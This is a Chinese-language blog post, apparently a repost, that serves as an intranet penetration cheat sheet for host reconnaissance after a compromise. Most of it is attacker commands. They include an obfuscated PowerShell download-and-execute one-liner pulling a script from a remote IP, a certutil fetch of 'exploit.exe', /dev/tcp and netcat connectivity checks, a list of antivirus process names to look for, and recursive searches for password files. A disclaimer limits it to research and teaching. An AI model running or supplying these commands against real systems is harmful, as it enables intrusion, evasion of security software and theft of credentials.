【内网渗透】- 主机信息搜集

admin
admin
admin
138658
文章
114
评论
2022年3月27日20:11:43评论111 views字数 1063阅读3分32秒阅读模式

1. 判断是否出网2. 进程列表(杀软)3. tcp连接情况(端口)4. 查看在线用户5. 判断Windows主机是否在域内6. net use 连接信息7. 敏感文件快速查找

1. 判断是否出网

# dns - linux
ping -c 2 aa.dnslog.cn
ping -c 2 114.114.114.114

# dns - win
ping -n 2 aa.dnslog.cn
ping -n 2 114.114.114.114

# http - linux
curl http://10.10.10.10/xx
## 通过tcp判断
nc -lp 8888 -vv
cat < /dev/tcp/10.10.10.10/8888

# http - win
echo set-alias -name xz -value IEX;x^z (New-Object "Ne`T.WeB`ClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://10'+'.10.10.245'+':8000/a') | p^o^w^e^r^s^h^e^l^l -

start iexplore http://cfbyx2.dnslog.cn
#等待一会kill
taskkill /F /IM iexplore.exe

certutil.exe -urlcache -split -f http://10.10.10.10:8888/aaa exploit.exe

2. 进程列表(杀软)

# windows

tasklist -v
主机启动的服务:net start

# Linux

ps -elf
ps -aux

whatav:https://github.com/StudyCat404/WhatAV

# 常见的
青藤云相关:Titan
天擎:360EntClient.exe/QAXEntClient 
Windows Defender:msMpEng.exe 
360管家:ZhuDongFangYu.exe 
火绒:HIPS.exe

3. tcp连接情况(端口)

netstat -ano

LISTENING
ESTABLISHED

ss -ano

4. 查看在线用户

# windows

query user

# linux

w

5. 判断Windows主机是否在域内

net time /domain

ipconfig /all

6. net use 连接信息

包括在资源管理窗口查看网络信息,共享信息

net use

7. 敏感文件快速查找

# linux下使用find命令

find / -name "*password*"

# windows下使用dir递归查询

cd C:
dir /s *password*.*


原文始发于微信公众号(信安文摘):【内网渗透】- 主机信息搜集

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月27日20:11:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透】- 主机信息搜集https://cn-sec.com/archives/840717.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息